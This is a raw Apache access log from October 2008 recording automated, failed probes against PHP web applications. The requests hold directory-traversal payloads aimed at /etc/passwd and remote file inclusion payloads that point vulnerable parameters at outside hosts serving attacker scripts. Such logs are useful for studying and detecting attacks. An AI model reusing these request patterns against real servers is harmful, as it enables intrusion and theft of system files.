72.243.169.10 - - [22/Oct/2008:00:15:22 -0400] "GET /logs/access_log.Q108092500///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
72.243.169.10 - - [22/Oct/2008:00:15:22 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
72.243.169.10 - - [22/Oct/2008:00:15:22 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
65.254.55.178 - - [22/Oct/2008:00:15:23 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://esvv.eu/css/bodo.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.812"
65.254.55.178 - - [22/Oct/2008:00:15:23 -0400] "GET /logs/error_log.Q108060700/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://esvv.eu/css/bodo.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
65.254.55.178 - - [22/Oct/2008:00:15:23 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://esvv.eu/css/bodo.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
65.254.55.178 - - [22/Oct/2008:00:15:23 -0400] "GET /logs/error_log.Q108060500/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://esvv.eu/css/bodo.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
201.22.6.28 - - [22/Oct/2008:00:15:46 -0400] "GET /logs/access_log.Q108101100//include/lib.inc.php?site_path=http://www.waterforlife.it/alb?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:15:47 -0400] "GET //include/lib.inc.php?site_path=http://www.waterforlife.it/alb?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
